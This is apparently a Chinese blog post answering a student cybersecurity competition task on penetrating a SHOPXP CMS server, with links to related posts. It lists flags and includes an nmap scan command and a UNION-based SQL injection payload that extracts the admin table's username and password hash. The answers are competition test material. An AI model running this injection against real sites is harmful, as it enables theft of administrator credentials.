B-1:CMS网站渗透

最新推荐文章于 2024-12-23 15:48:10 发布
原创 最新推荐文章于 2024-12-23 15:48:10 发布 · 797 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#服务器 #数据库 #前端

该文章详细描述了针对B-1CMS服务器的一系列渗透测试步骤,包括发现网站运行在8089端口,网站名为SHOPXP.cn,存在名为/pinglun.asp的SQL注入漏洞,数据库表名为shopxp_admin,管理员加密密码为7a57a5a743894a0e,以及服务器本地名称为workgrou-sypyia。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

B-1:CMS网站渗透
任务环境说明:
	服务器场景:Server2206(关闭链接)
	服务器场景操作系统:未知
1.使用渗透机对服务器信息收集,并将服务器中网站服务端口号作为flag提交;
2.使用渗透机对服务器信息收集,将网站的名称作为flag提交;
3.使用渗透机对服务器渗透,将可渗透页面的名称作为flag提交; 
4.使用渗透机对服务器渗透,并将网站中所用的数据库的表名作为flag提交;
5.使用渗透机对服务器渗透,将网站管理员的加密密码作为flag提交;
6.使用渗透机对服务器渗透,将服务器的本地名称作为flag提交。

1.使用渗透机对服务器信息收集,并将服务器中网站服务端口号作为flag提交;


flag{8089}

2.使用渗透机对服务器信息收集,将网站的名称作为flag提交;


flag{SHOPXP.cn}

3.使用渗透机对服务器渗透,将可渗透页面的名称作为flag提交;


https://blog.csdn.net/u013102998/article/details/17373329
sql注入漏洞存在于/admin/pinglun.asp文件


flag{pinglun.asp}

4.使用渗透机对服务器渗透,并将网站中所用的数据库的表名作为flag提交;

?id=1 union select 1,2,admin,4,5,password,7,8,9,10,11 from shopxp_admin


flag{shopxp_admin}

5.使用渗透机对服务器渗透,将网站管理员的加密密码作为flag提交;


flag{7a57a5a743894a0e}

6.使用渗透机对服务器渗透,将服务器的本地名称作为flag提交。

nmap -O -A  192.168.14.131


flag{workgrou-sypyia}

渗透基础环境搭建--cms
madao1o_o的博客
02-25 901
CMS(内容管理系统) CMS是"Content Management System"的缩写,意为"内容管理系统"。 内容管理系统是企业信息化建设和电子政务的新宠,也是一个相对较新的市场。对于内容管理,业界还没有一个统一的定义,不同的机构有不同的理解。(通俗来说:为你提供网站建设所需要的前后端的模板,下载之后只需要修改些静态页面原本就行) 国内主流的cms网站
渗透测试学习9:CMS渗透
weixin_44315099的博客
03-06 2666
目录概述cms简述robots协议dedecms环境搭建与渗透利用 概述 cms简述 内容管理系统,也可以理解为模板。 cms管理系统识别:通过某项特征来识别,获得网站某个文件的MD5或者⽤正则表达式与字典里面的关键字进行匹配,如果匹配成功就说明这个站点是对于的CMS。 可以用指纹查询来判断目标站点用的什么cms。 国内指纹识别: 云悉 http://www.yunsee.cn/ 潮汐指纹 http://finger.tidesec.net/ who am i web指纹识别 http://whatweb.
极致CMS 1.7 审计与渗透测试
feng的博客
04-04 2575
前言 几天前在先知上看到了Firebasky师傅在先知上发的关于极致CMS渗透测试。这个CMS的洞虽然已经公布了很久,但是因为自己还是太菜,基本上没有怎么接触过多少CMS,因此就从网上把极致CMS下载了下来,在本地搭建了一下环境来测试。 github上的极致CMS 这里我下载的是1.7版本,考虑到1.9版本可能大多数的洞都修了,就不好玩了,先把1.7试一遍,再搭一下1.9版本的看看。这篇文章相对来说会很乱,因为行文的思路是我随手乱试思路了。 后台上传文件 本地搭建一下,设置一下管理员账号和密码,直接自己登
渗透测试:使用phpstudy搭建bwapp/dvwa/phpcms/pikachu环境
莫忘初心yhj
12-10 2499
phpstudy和IIS搭建PHP及欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学
49-渗透测试模拟实战(二)-BlueCMS平台
XLbb的博客
06-10 1663
渗透测试是维护的重要组成部分,可以帮助组织识别并修复潜在的安全漏洞,减少被恶意攻击的风险。然而,进行渗透测试时必须遵守法律和道德规范,确保所有活动都在授权范围内进行。
vuInhub靶场实战系列--prime:1
weixin_45221204的博客
06-05 1438
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍prime:1靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)、wpscan、msf、netcat、反弹shell、linux内核提权等内容。使用nmap进行主机发现和端口扫描使用dirbsearch进行目录扫描网页分析,进行wfuzz爆破参数和值netcat监听。
深入解析ISO 19453-1:制造业数据交换的高效安全秘籍
[深入解析ISO 19453-1:制造业数据交换的高效安全秘籍](https://iolap-com-strapi-cms-upload.s3.amazonaws.com/9_4c54e15b51.png) # 摘要 本文深入探讨了ISO 19453-1标准的各个方面,从概述到核心规范解读,再到...
DC系列之DC-1渗透测试
最新发布
qq_45392044的博客
12-23 1123
例如:当spider访问一个网站(http://www.xxx.com)时,首先会检查该网站中是否存在http://www.xxx.com/robots.txt这个文件,如果 Spider找到这个文件,它就会根据这个文件的内容,来确定它访问权限的范围。如果有一些命令具有suid标志,说明这个命令在执行的过程中,会短暂的获得(其实不短暂)root权限,如果我们通过这些拥有suid标志的命令去调用bash的话,这个bash也会继承suid权限,也就会继承root权限。那我们怎么去寻找有suid标识的命令呢?
SD卡协议3.0 vs UHS-II:揭秘高效存储协同工作原理
[SD卡协议3.0 vs UHS-II:揭秘高效存储协同工作原理](https://www.sdcard.org/cms/wp-content/uploads/2022/12/1.png) # 摘要 SD卡技术作为一种广泛应用于数字设备中的存储介质,其演进显著推动了存储领域的发展。...
hackthebox - october (考点:october cms安全)
冬萍子癸水
05-24 585
1 扫描 常规端口,22想到ssh登录,80进web搜集信息,nmap扫描里看到80运行着October CMS 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA) | 2048 16:08:68:51:d1:7b:07:5a:34:
EmpireCMS4.5 渗透测试及靶场搭建(漏洞复现)
Continuejww的博客
08-30 3184
成功在网站根目录写入webshell连接蚁剑目录遍历图片内的栏目信息全部都含有如上图的xss漏洞。
某站点cms系统渗透测试
qq_36585338的博客
07-27 596
通过前期信息收集,发现目标站点是beescms建站系统所搭建,而beescms v4.0存在后台sql注入漏洞:Beescms v4.0由于后台登录验证码设计缺陷以及代码防护缺陷导致存在bypass全局防护的SQL注入。
基于某商城CMS渗透测试
网络空间安全学习
06-12 2379
 检索ip信息,获取网站的信息  发现22端口存在高危  御剑扫描端口信息  发现开放以上端口信息  nmap扫描信息 扫描出来端口的信息:  扫描目录 状态码为200的:其他目录信息:  刚刚信息收集,发现22端口开放,存在高危,尝试弱口令爆破  连接失败,说明可能不是弱口令  尝试弱口令爆破数据库  同样没有检查出,可能不存在弱口令 尝试登录后台:  尝试输入账
BlueCms开源环境渗透学习(附代码审计学习)
weixin_53884648的博客
09-25 5619
学习审计开源的CMS来练习代码审计
CMS网站渗透-Server2206-(解析+环境)
m0_46056107的博客
01-29 665
需要换加qq
BurpSuite实战教程01-web渗透安全测试(靶场搭建及常见漏洞攻防)
zzz6583zz的博客
05-09 3207
渗透测试(Penetrationtest)即安全工程师模拟黑客,在合法授权范围内,通过信息搜集、漏洞挖掘、权限提升等行为,对目标对象进行安全测试(或攻击),最终找出安全风险并输出测试报告。Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透。Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,提权,内网渗透,留后门,清理痕迹。
中职网络空间安全2023B模块CMS网站渗透
qq_61988806的博客
03-27 455
服务器场景:Server2206(关闭链接)
2023年中职网络安全竞赛——CMS网站渗透解析
旺仔Sec&blog
03-06 4193
2023年中职网络安全竞赛——CMS网站渗透解析
高效CMS扫描工具:自动化识别网站核心管理
这种脚本通常被网络安全专家、渗透测试员或系统管理员使用,以发现网站的潜在弱点或确保其配置正确,避免安全漏洞。 在描述中提到的json字典,实际上是一种轻量级的数据交换格式,它基于键值对,通常用于网络应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Wh1teSu

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值